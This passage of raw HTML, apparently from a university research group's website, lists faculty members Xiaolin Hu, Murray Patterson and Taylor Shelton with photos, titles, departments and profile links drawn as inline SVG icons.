61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c40-outer\">\n <div data-colibri-id=\"182-c40\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c40 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c41\" class=\"d-block style-973 style-local-182-c41 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/08/hu_new-1.jpg\" class=\"wp-image-1348 style-973-image style-local-182-c41-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c41-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c42\" class=\"h-global-transition-all h-heading style-974 style-local-182-c42 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-974 style-local-182-c42\">\n <!---->\n <!---->\n <h4 class=\"\">Xiaolin Hu</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c43\" class=\"h-text h-text-component style-975 style-local-182-c43 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Professor</p>\n </div>\n </div>\n <div data-colibri-id=\"182-c44\" class=\"h-text h-text-component style-976 style-local-182-c44 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c45\" class=\"style-977 style-local-182-c45 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://csds.gsu.edu/profile/xiaolin-hu/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://scholar.google.com/citations?user=zeU19nAAAAAJ&hl=en\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c46-outer\">\n <div data-colibri-id=\"182-c46\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c46 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c47\" class=\"d-block style-973 style-local-182-c47 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-patterson.jpg\" class=\"wp-image-1391 style-973-image style-local-182-c47-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c47-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c48\" class=\"h-global-transition-all h-heading style-974 style-local-182-c48 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-974 style-local-182-c48\">\n <!---->\n <!---->\n <h4 class=\"\">Murray Patterson</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c49\" class=\"h-text h-text-component style-975 style-local-182-c49 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Assistant Professor </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c50\" class=\"h-text h-text-component style-976 style-local-182-c50 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c51\" class=\"style-977 style-local-182-c51 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/murray-patterson-449a947\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://cas.gsu.edu/profile/murray-patterson/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://scholar.google.com/citations?user=X4J8vAEAAAAJ&hl=en\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c52-outer\">\n <div data-colibri-id=\"182-c52\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c52 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c53\" class=\"d-block style-973 style-local-182-c53 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Taylor-shelton_300x300.jpeg\" class=\"wp-image-705 style-973-image style-local-182-c53-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c53-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c54\" class=\"h-global-transition-all h-heading style-974 style-local-182-c54 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-974 style-local-182-c54\">\n <!---->\n <!---->\n <h4 class=\"\">Taylor Shelton</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c55\" class=\"h-text h-text-component style-975 style-local-182-c55 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Assistant Professor</span></p>\n </div>\n </div>\n <div data-colibri-id=\"182-c56\" class=\"h-text h-text-component style-976 style-local-182-c56 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Geosciences</p>\n </div>\n </div>\n <div data-colibri-id=\"182-c57\" class=\"style-977 style-local-182-c57 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/taylor-shelton-28a4b3291\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://cas.gsu.edu/profile/taylor-shelton/\" h-use-smooth-scroll=\"true\">\n <div 